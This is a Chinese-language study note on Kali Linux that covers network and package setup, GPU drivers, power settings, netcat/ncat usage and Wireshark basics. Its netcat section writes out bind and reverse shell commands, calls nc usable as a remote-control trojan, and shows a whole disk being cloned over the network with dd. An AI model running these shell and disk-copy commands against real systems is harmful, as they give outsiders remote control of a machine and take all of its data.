Kali学习笔记

网络配置

dhclient ethh0;//自动获取ip，临时
ifconfig eth0 ip地址;//指定ip，临时
route add default gw ip地址;//指定默认网关，临时
route add -net 网段 gw 网关；//为网段添加网关，临时
echo nameserver ip地址 > /etc/resolv.conf;//添加DNS服务器，临时
以上均临时生效

---

编辑/etc/network/interface来固定配置，会一直生效
iface eth0 inet static
address 固定ip地址
netmask 子网掩码
network 网络地址
broadcast 广播地址
gateway 网关地址
dns-nameservers DNS服务器地址1 地址2 …
up route add -net 网络地址 gw 网关 网卡名称

软件管理

• 更新升级
  apt-get update;更新索引文件，kali知道那些知道可以更新
  apt-get upgrade;更新软件包
  apt-get dist-upgrade;大的版本更新

• 更改源
  vim /etc/apt/sources.list

• 软件安装
  apt-get install 软件名
  smplayer 媒体播放器
  gdebo 图形化安装deb文件
  flashplugin-nonfree flash插件
  amule qbittorrent 电驴
  geany 简便图形化程序开发环境
  stardict 英文词典
  meld 图形化进行文件差异比较
  ttf-wqy-microhei windows字体
  kchmviewer 打开chm文件
  freemind 思维脑图
  netspeed 查看网速
  mtr 图形化路由追踪
  filezilla ftp文件传输

安装显卡驱动

GPU（图形处理单元），一个高端的GPU可能是上千个核心，对于渗透测试中的暴力破解可以放到GPU去运算，可以节省大量的时间。
kali自带的显卡驱动不能很好的发挥GPU运算的能力，需要自己安装。

• NVIDIA显卡驱动安装
  apt-get update
  apt-get dist-upgrade
  apt-get install -y linux-headers-$(uname -r)
  apt-get install nvidia-kernel-dkms

  sed ‘s/quite/quite nouveau.modeset=0/g’ -i /etc/default/grub
  update-grub
  reboot

  验证
  gixinfo | grep -i “direct rendering”
  如果显示：direct rendering:yes，则安装成功。

  无线网卡补丁
  最新版内核已经集成了无线驱动补丁
  airmon-ng 查看网卡驱动

并发线程限制

Ulimite用于限制 当前（一个窗口） shell内进程的资源使用情况。
ulimite -a 查看默认值
ulimite -s 数目 限制堆栈内存大小。
ulimite -m 最大值 -v 虚拟内存大小 限制当前shell的内存大小。

---

保持更改
编辑配置文件.bashrc
在该配置文件下添加ulimite命令。打开任意一个终端窗口，都会执行该命令。

电源优化配置

渗透测试系统耗电较大

• 延长电池寿命
  无操作挂起，关闭显示器。
  降低显示器亮度
  不使用时关闭无线网卡
  开启硬盘省电选项
  hdparm -i /dev/sda if AdvancedPM=yes then hdparm -B 1 -S 12 /dev/sda
  启动笔记本模式

  #！/bin/bash
  currentMode=$(cat /proc/sys/vm/laptop_mode)
  if [$currentMode -eq 0]
  then
  echo "5" > /proc/sys/vm/laptop_mode
  echo "Loptop Mode Enabled"
  else
  echo "0" > /proc/sys/vm/laptop_mode
  echo "Laptop Mode Disabled"
  fi

服务开关

kali默认关闭所有网络服务

运行级别0-6
update-rc.d ssh default 启动时默认执行ssh脚本

启动脚本目录/etc/init.d/ 执行该目录下的shell脚本可以启动相应服务

init 运行级别 以该运行级别重启操作系统

NETCAT–NC

网络中的瑞士军刀–小身材，大智慧

nc -h 查看所有能用的参数

• 功能

  侦听模式/传输模式
  telnet/获取banner信息，比telnet更加强大

  传输文本信息，可以当聊天工具
  传输文件/目录，可以当ftp
  加密传输文件
  远程控制/木马，360已经开始查杀了
  加密所有流量
  流媒体服务器

  远程克隆硬盘

---

• 作为Telnet使用
  nc -nv 1.1.1.1 110 -v 显示详细信息 -n 加ip地址

• 传输文本信息
  nc -l -p 端口号 侦听端口

  nc -nv ip地址 端口号 连接服务器端口

• 电子取证信息收集
  nc -l -p 端口号
  ls -l | nc -nv ip地址 端口号 //将输出内容重定向到nc上取证

  -q参数用来指定在输入命令多少秒后退出

• 传输文件
  nc -l -p 端口 >文件名

  nc -nv ip地址 端口 < 文件名 -q 1 //传递之后一秒，连接自动断开

• 传输目录
  tar -cvf - 目录 | nc -lp 端口号 -q 1 //打包目录，并监听端口

• nc -nv ip地址 端口号 | tar -xvf - //横线不能少

• 加密传文件
  nc -lp 端口号 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 文件 //接收方

  mcrypt --flush -Fbq -a rijdael-256 -m ecb < 文件 | nc -nv ip地址 端口号 -q 1 //发送方

• 流媒体服务
  cat 1.mp4 | nc -lp 333

  nc -nv 1.1.1.1 333 | mplayer -vo x11 -cache 3000 - //cache指定缓存大小，mplayer 需要自行安装，实现边播边放。

• 端口扫描
  nc -nvz ip地址 端口范围 //-z 扫描模式

  nc -vnzu ip地址 端口范围

• 远程硬盘克隆
  nc -lp 端口号 | dd of=/dev/sda //拷贝方

  dd if=/dev/sda | nc -nv ip地址 端口号 -q 1 //被克隆方 if=input file

• 远程控制

  • 正向：nc -lp 端口号 -c bash //把bash传给连接的客户端
    nc -nv ip地址 端口号 //客户端得到服务端控制权

  • 反向：nc -lp 端口号 //服务端得到客户端的控制权

    ​ nc -nv ip地址 端口号 -c bash //windows用户把bash改为cmd

  • 弱点

    NC缺乏加密和身份验证的能力

    不同系统/平台nc参数功能不尽相同

    ---

Ncat不同于NC,Ncat用于弥补nc的不足
Ncat包含于nmap工具包中
ncat -c bash --allow ip地址 -vnl 端口号 --ssl //ssl协议加密 allow指明允许连接的ip地址
ncat -nv ip地址 端口号 --ssl // ssl协议传输

Wireshark

• 功能
  抓包嗅探协议分析

  安全专家必备技能

  抓包引擎

  解码能力 //衡量抓包工具的能力

• 基本使用方法

  1.指定抓包的网卡
  2.选择模式
  如果不指定混杂模式，那么不经过本地ip不会被抓取到
  只有指定混杂模式，才能抓到局域网内的所有包
  3.设置抓包筛选器

  ​ 筛选器有两种：抓包筛选器，显示筛选器。

• 各种协议

  UDP 面向无连接的协议，发送之后不管接受端是否有接收到。

  TCP 面向有连接的协议，三次握手，发送之后还要确认是否有接收到。开销比较大。

  • 三次握手

    SYN——>

    <——SYN,ACK

    SYN，ACK——>

DNS 域名解析协议（基于UDP的应用层协议）。

HTTP 应用层协议（基于TCP）

wireshark是通过端口来区分不同协议

Follow TCP Stream选项清楚的显示会话整个过程